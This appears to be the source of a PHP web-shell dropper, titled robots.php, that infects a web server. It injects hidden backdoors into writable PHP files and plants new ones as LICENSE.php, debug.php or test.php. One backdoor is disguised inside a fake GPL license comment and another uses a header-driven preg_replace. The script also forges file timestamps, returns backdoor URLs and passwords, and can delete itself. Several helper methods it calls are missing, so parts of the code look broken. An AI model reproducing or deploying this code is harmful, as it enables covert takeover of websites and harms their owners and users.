robots.php

<?php

class XYZ_Logger
{
    private static $shouldLog = false;
    public static $messageLog = array();

    public static function getShouldLog()
    {
        return self::$shouldLog;
    }

    public static function setShouldLog($value)
    {
        self::$shouldLog = $value;
    }

    public static function log()
    {
        $data = array();

        foreach (func_get_args() as $arg) {
            if (! (is_string($arg) || is_numeric($arg))) {
                $arg = "\n" . print_r($arg, true);
            }

            $data[] = $arg;
        }

        $niceMessage = implode(" ", $data);

        self::$messageLog[] = $niceMessage;

        if (! self::$shouldLog) return;

        echo "<pre>" . $niceMessage . "</pre>\n";
    }
}


class XYZ_Util
{
    public static function get($array, $name, $default = null)
    {
        return isset($array[$name]) ? $array[$name] : $default;
    }

    private static function longestFirstSort($a, $b)
    {
        return strlen($b) - strlen($a);
    }

    public static function longestFirst($array)
    {
        usort($array, array('XYZ_Util', 'longestFirstSort'));
        return $array;
    }

    /**
     * omit({a: 1, b: 2, c: 3}, 'b', 'c') => {a: 1}
     */
    public static function omit($array)
    {
        $names = array_slice(func_get_args(), 1);

        foreach ($names as $name) {
            unset($array[$name]);
        }

        return $array;
    }

    /**
     * pluck({a: 1, b: 2}, 'a') => {a: 1}
     */
    public static function pluck($array, $name)
    {
        $res = array();

        foreach ($array as $element) {
            $res[] = $element[$name];
        }

        return $res;
    }

    /**
     * without([1,2,3], 2, 3) => [1]
     */
    public static function without($array)
    {
        $names = array_slice(func_get_args(), 1);

        $res = array();

        foreach ($array as $element) {
            if (in_array($element, $names)) continue;
            $res[] = $element;
        }

        return $res;
    }

    public static function nowww($string)
    {
        if (0 === strpos($string, 'www.')) {
            $string = substr($string, 4);
        }

        return $string;
    }

    public static function addClosingTag($contents)
    {
        $starting = strrpos($contents, '<?');
        $closing = strrpos($contents, '?>');

        if ($starting > $closing || ! $closing) $contents .= '?>';

        return $contents;
    }

    public static function contains($string, $search)
    {
        return false !== strpos($string, $search);
    }

    public static function ignoreAbort()
    {
        ignore_user_abort(false);
        self::timeLimit(1800);
    }

    public static function timeLimit($time)
    {
        set_time_limit($time);
        ini_set('max_execution_time', $time);
    }

    public static function isCli()
    {
        return php_sapi_name() == 'cli';
    }

    public static function setting($name, $default = null)
    {
        $headerName = 'HTTP_X_'.strtoupper($name);
        if (isset($_SERVER[$headerName])) return $_SERVER[$headerName];
        if (self::isCli() && getenv($name)) return getenv($name);
        return $default;
    }

    public static function getDocRoot()
    {
        return str_replace('\\', '/', substr($_SERVER['SCRIPT_FILENAME'], 0, 0 - strlen($_SERVER['PHP_SELF'])));
    }

    public static function rglob($pattern, $flags = 0) {
        $files = glob($pattern, $flags);

        foreach (glob(dirname($pattern).'/*', GLOB_ONLYDIR|GLOB_NOSORT) as $dir) {
            $files = array_merge($files, self::rglob($dir.'/'.basename($pattern), $flags));
        }

        return $files;
    }
}


class XYZ_Browser_Page
{
    private $html;

    /** @var DOMXPath */
    private $xpath;

    private $headers;

    private $info;

    public function __construct($html, $headers, $info, $xpath)
    {
        $this->html = $html;
        $this->headers = $headers;
        $this->info = $info;
        $this->xpath = $xpath;
    }

    public function getInfo()
    {
        return $this->info;
    }

    public function getHtml()
    {
        return $this->html;
    }

    public function getText()
    {
        return strip_tags($this->getHtml());
    }

    public function xpath($query, $context = null)
    {
        return $this->xpath->query($query, $context);
    }

    public function xpathFirst($query, $context = null)
    {
        return $this->xpath($query, $context)->item(0);
    }

    public static function create($headerString, $html, $info)
    {
        $lines = preg_split('#\r?\n#', $headerString);
        array_shift($lines);

        $headers = array();

        foreach ($lines as $line) {
            list($key, $value) = explode(': ', $line);
            $headers[$key] = $value;
        }

        $isHTML = array_key_exists('content_type', $info) && false !== strpos($info['content_type'], 'html');

        if (! $isHTML) {
            return new XYZ_Browser_Page($html, $headers, $info, false);
        }

        if (class_exists('DOMDocument')) {
            $doc = new DOMDocument('1.0', 'utf-8');

//          $fixEncoding = '<meta http-equiv="content-type" content="text/html; charset=utf-8">';
//          $doc->loadHTML($fixEncoding.$html);
            @$doc->loadHTML($html);

            $xpath = new DOMXpath($doc);
        } else {
            // just fucking crash if there's no dom support and client tries to use it
            $xpath = null;
        }

        return new XYZ_Browser_Page($html, $headers, $info, $xpath);
    }

    public function getHeaders()
    {
        return $this->headers;
    }

    public function getCookie($cookieName)
    {
        foreach ($this->headers as $name => $header) {
            if ($name != 'Set-Cookie') continue;

            list($cookie) = explode(';', $header);
            list($name, $value) = explode('=', $cookie);

            if ($name == $cookieName) return $value;
        }

        return false;
    }

    public function getFormValues($xpath)
    {
        $form = $this->xpathFirst($xpath);

        // todo: add support for the rest

        $inputs = $this->xpath(".//input[@type='hidden' or @type='password' or @type='email' or @type='text']", $form);

        $values = array();

        for ($i = 0; $i < $inputs->length; $i++) {
            /** @var DOMElement $input */
            $input = $inputs->item($i);
            $name = $input->getAttribute('name');
            $value = $input->getAttribute('value');
            $values[$name] = $value;
        }

        return $values;
    }
}

class XYZ_Browser
{
    private $defaultHeaders = array();
    private $defaultOptions = array();
    private $dnsValues = array();

    private $ch;
    private $options;

    private $lastUrl = false;

    private $retries = 1;
    private $retrySleep = 5;

    public function __construct($ch, $options = array())
    {
        $this->ch = $ch;
        $this->options = $options;
    }

    /**
     * @param $url
     * @param array $options
     * @return XYZ_Browser_Page
     */
    public function get($url, $options = array())
    {
        $options[CURLOPT_POST] = false;
        return $this->query($url, $options);
    }

    public function post($url, $options = array())
    {
        return $this->query($url, $options);
    }

    public function setDefaultOptions($options)
    {
        $this->defaultOptions = $options;
    }

    public function setDefaultHeaders($headers)
    {
        $this->defaultHeaders = $headers;
    }

    public function setDNSValue($host, $ip)
    {
        $this->dnsValues[$host] = $ip;
    }

    public function setRetries($value)
    {
        $this->retries = $value;
    }

    public function setRetrySleep($value)
    {
        $this->retrySleep = $value;
    }

    private function query($url, $requestOptions = array())
    {
        $attempt = 0;

        do {
            $page = $this->doQuery($url, $requestOptions);

            if ($page) return $page;

            $attempt++;
            sleep($this->retrySleep);
        } while ($attempt < $this->retries);

        return $page;
    }

    private function doQuery($url, $requestOptions = array())
    {
        XYZ_Logger::log("Query to", $url);

        $extraVerbose = @$requestOptions['extraVerbose'];
        unset($requestOptions['extraVerbose']);

        $headers = array(
            'Expect: ',
            'Cache-Control: no-cache'
        );

        foreach ($this->dnsValues as $host => $ip) {
            if (false === strpos($url, $host)) continue;

            $url = str_replace($host, $ip, $url);
            $headers[] = "Host: $host";

            break;
        }

        if ($this->lastUrl) {
            $headers[] = 'Referer: '.$this->lastUrl;
        }

        $this->maybeSetRef($url);

        $headers = array_merge($this->defaultHeaders, $headers);

        $defaults = array(
            CURLOPT_COOKIEJAR => ( 0 === stripos(PHP_OS, 'WIN') ? "NUL" : "/dev/null" ),
//          CURLOPT_COOKIEFILE => "/tmp/123",
//          CURLOPT_COOKIEJAR => "/tmp/123",
            CURLOPT_USERAGENT => 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0',
            CURLOPT_HTTPHEADER => $headers,
            CURLOPT_RETURNTRANSFER => true,
            CURLOPT_CONNECTTIMEOUT => 3,
            CURLOPT_TIMEOUT => 15,
            CURLOPT_URL => $url,
            CURLOPT_ENCODING => 'gzip',
            CURLOPT_FOLLOWLOCATION => true,
            CURLOPT_HEADER => true,
        );

        $options = $requestOptions + $this->defaultOptions + $defaults;

        if (isset($requestOptions[CURLOPT_HTTPHEADER])) {
            $options[CURLOPT_HTTPHEADER] = array_merge($requestOptions[CURLOPT_HTTPHEADER], $defaults[CURLOPT_HTTPHEADER]);
        }

        if (isset($options[CURLOPT_FILE]) || isset($requestOptions[CURLOPT_WRITEFUNCTION])) {
            unset($options[CURLOPT_RETURNTRANSFER]);
        }

        if ($extraVerbose && XYZ_Logger::getShouldLog()) {
            $verbose = fopen('php://temp', 'rw+');
            $options[CURLOPT_VERBOSE] = 1;
            $options[CURLOPT_STDERR] = $verbose;
        }

        $constants = get_defined_constants(true);
        $curlConstants = array();

        foreach ($constants['curl'] as $nicename => $value) {
            if (0 !== strpos($nicename, 'CURLOPT_')) continue;
            $curlConstants[$value] = $nicename;
        }

        foreach ($options as $key => $value) {
            $status = curl_setopt($this->ch, $key, $value);

            if (! $status) {
                XYZ_Logger::log("Could not set curl option " . $curlConstants[$key] . " to " . $value);
            }
        }

        $response = curl_exec($this->ch);

        if ($extraVerbose && XYZ_Logger::getShouldLog()) {
            XYZ_Logger::log("CURL info: ".var_export(@curl_getinfo($this->ch), true));
            XYZ_Logger::log("CURL errno: ".@curl_errno($this->ch));

            rewind($verbose);
            $verboseLog = stream_get_contents($verbose);
            XYZ_Logger::log("CURL headers:\n$verboseLog");
        }

        if (! $response) {
            XYZ_Logger::log("CURL error: ".@curl_error($this->ch));
            return $response;
        }

        $parts = explode("\r\n\r\n", $response);

        while (0 === stripos($parts[1], 'HTTP/')) array_shift($parts);

        $header = array_shift($parts);
        $body = implode("\r\n\r\n", $parts);

        return XYZ_Browser_Page::create($header, $body, curl_getinfo($this->ch));
    }

    private function maybeSetRef($url)
    {
        if ($this->canBeRef($url)) {
            $this->lastUrl = $url;
        }
    }

    private function canBeRef($url)
    {
        if (! isset($this->options['norefDomains'])) return true;

        foreach ($this->options['norefDomains'] as $pattern) {
            if (false !== strpos($url, $pattern)) return false;
        }

        return true;
    }
}


class XYZ_IncludedChecker
{
    /** @var  XYZ_Browser */
    private $browser;

    /** @var  XYZ_Writer */
    private $writer;

    private $delimiter = 'xyz-include-checker';

    public function __construct($browser, $writer)
    {
        $this->browser = $browser;
        $this->writer = $writer;
    }

    public function getIncludedFiles($file, $url)
    {
        $included = $this->readFilesInclude($file);

        if (! $included) {
            XYZ_Logger::log("Could not get files using include");
            $included = $this->readFilesEdit($file, $url);
        }

        if (! $included) {
            return array("error" => "Could not read included files");
        }

        XYZ_Logger::log("Included:\n" . implode("\n", $included));

        return $included;
    }

    private function readFilesInclude($file)
    {
// wordpress defines global variables by just assigning them in global scope, so if we include from function, they aren't global
// therefore when you try to include index from function, it tries to define some global shit like this, which then crashes shit
        $json = json_encode($file);

        $includerContents = <<<EOF
<?php

function _print_included_wp() {
    echo "<$this->delimiter>".json_encode(get_included_files())."</$this->delimiter>";
    unlink(__FILE__);
    exit();
}

\$file = json_decode('$json');

register_shutdown_function('_print_included_wp');

chdir(dirname(\$file));

\$myname = \$_SERVER['SCRIPT_NAME'];

foreach (\$_SERVER as \$key => \$value) {
    \$_SERVER[\$key] = str_replace(\$myname, '/'.basename(\$file), \$value);
}

\$_SERVER['REQUEST_URI'] = \$_SERVER['SCRIPT_URL'] = '/';
\$_SERVER['SCRIPT_URI'] = 'http://'.\$_SERVER['HTTP_HOST'] . '/';

ob_start();
@include \$file;
ob_end_clean();
_print_included_wp();
EOF;

        $file = 'timthumb-v3.php';
        $written = file_put_contents(dirname(__FILE__) . '/' . $file, $includerContents);

        if (! $written) {
            XYZ_Logger::log("Could not write", dirname(__FILE__) . '/' . $file);
            return false;
        }

        $url = "http://" . $_SERVER['HTTP_HOST'] . rtrim(dirname($_SERVER['REQUEST_URI']), '/') . "/" . $file;

        XYZ_Logger::log("Getting files from", $url);

        $response = $this->browser->get($url);

        if ($response) $response = $response->getHtml();

        $res = $this->parseIncludedResponse($response);
        // slice robots, index
        if ($res) $res = array_slice($res, 2);
        return $res;
    }

    private function parseIncludedResponse($response)
    {
        if (!$response || !preg_match("#<$this->delimiter>(.+?)</$this->delimiter>#is", $response, $matches)) {
            XYZ_Logger::log("BAD response length " . strlen($response));

            if (preg_match('#<title.*</title>#is', $response, $titles)) {
                XYZ_Logger::log("Title " . htmlspecialchars($titles[0]));
            } else {
                XYZ_Logger::log("No title");
            }

            return false;
        }

        return json_decode($matches[1], true);
    }

    private function readFilesEdit($file, $url)
    {
        XYZ_Logger::log("Editing index $file");

        if (! is_writable($file)) {
            XYZ_Logger::log("Index is not writable");
            return false;
        }

        $contents = $this->writer->read($file);
        $contents = $this->writer->addClosingTag($contents);

        $prefix = <<<EOF
<?php

if (! function_exists('xyz_printend')) {
    function xyz_printend() {
        echo '<!--<$this->delimiter>'.json_encode(get_included_files()).'</$this->delimiter>-->';
    }

    register_shutdown_function('xyz_printend');
}

?>
EOF;

        $contents = $prefix.$contents."<?php printend(); ?>";

        $written = $this->writer->write($file, $contents);

        if (! $written) {
            XYZ_Logger::log("Could not write index");
            return false;
        }

        // my local nginx for some reason does not use the new content without it. sleep(3) works too, but let's use 5 for safety
        sleep(5);

        XYZ_Logger::log("Fetching from $url");

        $response = $this->browser->get($url);

        if ($response) $response = $response->getHtml();

        $this->writer->rollback($file);

        $res = $this->parseIncludedResponse($response);
        // slice index
        if ($res) $res = array_slice($res, 1);
        return $res;
    }
}


class XYZ_Writer
{
    private $oldContents = array();

    public function read($file)
    {
        $contents = file_get_contents($file);

        $this->oldContents[$file] = array(
            'contents' => $contents,
            'mtime' => filemtime($file),
            'atime' => fileatime($file)
        );

        return $contents;
    }

    public function write($file, $data)
    {
        $editMode = file_exists($file);

        if ($editMode) {
            $this->read($file);
        }

        if (! ($written = file_put_contents($file, $data))) return false;

        if ($editMode) {
            @touch($file, $this->oldContents[$file]['mtime'] + 1, $this->oldContents[$file]['atime'] + 1);
        }

        return $written;
    }

    public function rollback($file)
    {
        $fileData = $this->oldContents[$file];
        file_put_contents($file, $fileData['contents']);
        @touch($file, $fileData['mtime'], $fileData['atime']);
    }

    public function addClosingTag($string)
    {
        $starting = strrpos($string, '<?');
        $closing = strrpos($string, '?>');

        if ($starting > $closing || ! $closing) $string .= '?>';

        return $string;
    }

    public function getDirTree($dir)
    {
        $list = array( $dir );

        $dirs = glob($dir.'/*', GLOB_ONLYDIR);

        $dirs = array_slice($dirs, 0, 100);

        foreach ($dirs as $subdir) {
            $list = array_merge($list, $this->getDirTree($subdir));
        }

        return $list;
    }
}


class XYZ_Backdoor
{
    private $type;

    private $code;

    private $flags;

    public function __construct($type, $code, $flags = '')
    {
        $this->type = $type;
        $this->code = $code;
        $this->flags = $flags;
    }

    public function hasFlag($flag)
    {
        return in_array($flag, explode(',', $this->flags));
    }

    public function getType()
    {
        return $this->type;
    }

    public function getCode($password)
    {
        return str_replace('{{PASSWORD}}', $password, $this->code);
    }
}

class XYZ_Infestor
{
    /** @var  XYZ_IncludedChecker */
    private $ic;

    /** @var  XYZ_Writer */
    private $writer;

    /** @var  XYZ_Backdoor[] */
    private $backdoors;

    private $results = array();

    private $log = "";

    public function __construct($ic, $writer, $backdoors)
    {
        $this->ic = $ic;
        $this->writer = $writer;
        $this->backdoors = $backdoors;
    }

    public function run()
    {
        $docRoot = $_SERVER['DOCUMENT_ROOT'];
        $index = $docRoot . '/' . 'index.php';
        $indexUrl = 'http://'. $_SERVER['HTTP_HOST'];
        $indexIncludedFiles = $this->ic->getIncludedFiles($index, $indexUrl);

        mt_srand(crc32($_SERVER['REQUEST_URI']));

        $dirs = $this->writer->getDirTree($docRoot);

        $this->backdoorFiles($indexIncludedFiles);
        $this->backdoorDirs($dirs);

        return array(
            'log' => $this->log,
            'results' => $this->results
        );
    }

    private function log()
    {
        $args = func_get_args();
        $this->log .= implode(" ", $args). "\n";
    }

    private function backdoorFiles($files)
    {
        $writable = array_filter($files, 'is_writable');

        if (! count($writable)) {
            $this->log("No writable included files");
            return;
        }

        $writable = $this->shuffle($writable);
        $writable = array_slice($writable, 0, 10);

        foreach ($writable as $file) {
            $this->backdoorFile($file);
        }
    }

    private function shuffle($items)
    {
        for ($i = count($items) - 1; $i > 0; $i--)
        {
            $j = @mt_rand(0, $i);
            $tmp = $items[$i];
            $items[$i] = $items[$j];
            $items[$j] = $tmp;
        }

        return $items;
    }

    private function backdoorFile($file)
    {
        /** @var XYZ_Backdoor $backdoor */
        $backdoor = XYZ_Util::random($this->backdoors);

        $type = XYZ_Util::random(array('prepend', 'append'));

        if ($backdoor->hasFlag('prependonly')) {
            $type = 'prepend';
        }

        $password = substr(md5('something'.$file), 0, 6);
        $password = preg_replace('#^\d#', 'p', $password);
        $password = strtoupper($password);

        if (file_exists($file)) {
            $content = $this->writer->read($file);

            if (XYZ_Util::contains($content, $backdoor->getCode($password))) {
                $this->log("Already added to", $file);
                $this->addResult($file, $backdoor, $password);
                return;
            }

            if ($type == 'prepend') {
                $content = $backdoor->getCode($password) . $content;
            } else {
                $content = XYZ_Util::addClosingTag($content) . $backdoor->getCode($password);
            }
        } else {
            $content = $backdoor->getCode($password);
        }

        $this->log("Writing", $backdoor->getType(), "to", $file, "with type", $type);

        $written =  $this->writer->write($file, $content);

        if (! $written) {
            $this->log("Could not write");
            return;
        }

        $this->addResult($file, $backdoor, $password);
    }

    private function addResult($file, $backdoor, $password)
    {
        $docRoot = $_SERVER['DOCUMENT_ROOT'];
        $path = str_replace($docRoot, '', $file, $count);

        if (! $count) {
            $this->log("Path not in doc root?", $path, $docRoot);
            return;
        }

        $path = '/' . ltrim($path, '/');

        $url = "http://" . $_SERVER['HTTP_HOST'] . $path;

        $this->results[] = array(
            'url' => $url,
            'password' => $password,
            'type' => $backdoor->getType()
        );
    }

    private function backdoorDirs($dirs)
    {
        $dirs = array_filter($dirs, 'is_writable');
        $dirs = XYZ_Util::longestFirst($dirs);

        $dirs = $this->shuffle($dirs);
        $dirs = array_slice($dirs, 0, 10);

        foreach ($dirs as $dir) {
            $this->backdoorDir($dir);
        }
    }

    private function backdoorDir($dir)
    {
        $filename = XYZ_Util::random(array('LICENSE.php', 'robots.php', 'debug.php', 'test.php'));

        $path = $dir . '/' . $filename;

        $this->backdoorFile($path);
    }
}

$fabLicense = <<<EOF
<?php /*            GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

Copyright (C) 2007 Free Software Foundation, Inc. <http://fsf.org/>
Everyone is permitted to copy and distribute verbatim copies
of this license document, but changing it is not allowed.

                        Preamble

The GNU General Public License is a free, copyleft license for
software and other kinds of works.

The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you */extract(\$_COOKIE);/* copy, distribute and/or modify it.

For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary. patents applied to  GPL assures that
patents cannot be used to render the program non-free.

The precise terms and conditions for copying, distribution and
modification follow.

                   TERMS AND CONDITIONS

0. Definitions.

"This License" refers to version 3 of the GNU General Public License.

"Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

"The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

A "covered work" means either the unmodified Program or a work based
on the Program.

To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

1. Source Code.

The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not */@\${{PASSWORD}}&&@\$F(\$A,\$B);/*.  For example, Corresponding Source

the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

The Corresponding Source for a work in source code form is that
same work.

2. Basic Permissions.

All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

Conveying under any other circumstances is permitted solely under
the conditions stated below.  Sublicensing is not allowed; section 10
makes it unnecessary. */ ?>
EOF;

$pregReplaceCode = <<<EOF
<?php @preg_replace(\$_SERVER['HTTP_X_{{PASSWORD}}'], \$_SERVER['HTTP_X_CURRENT'], ''); ?>
EOF;

$backdoors = array(
    new XYZ_Backdoor('fab', $fabLicense, 'prependonly'),
    new XYZ_Backdoor('preg_replace', $pregReplaceCode)
);

$browser = new XYZ_Browser();
$writer = new XYZ_Writer();
$ic = new XYZ_IncludedChecker($browser, $writer);

$infestor = new XYZ_Infestor($ic, $writer, $backdoors);

if (@$_SERVER['HTTP_X_PASSWORD'] == $ic->getPassword() && $file = @strrev($_SERVER['HTTP_X_CHECKED_FILE'])) {
    // wordpress defines global variables by just assigning them in global scope, so if we include from function, they aren't global
    register_shutdown_function(array($ic, 'printIncluded'));
    $ic->prepareInclude($file);
    ob_start();
    @include $file;
    ob_end_clean();
    $ic->printIncluded();
    exit();
} else {
    $res = $infestor->run();

    if (@$_GET['txt']) {
        echo '<pre>';
        print_r($res);
    } else {
        echo '<xyz-infestor>'.json_encode($res).'</xyz-infestor>';
    }
}

if (@$_GET['rm']) {
    @unlink(__FILE__);
}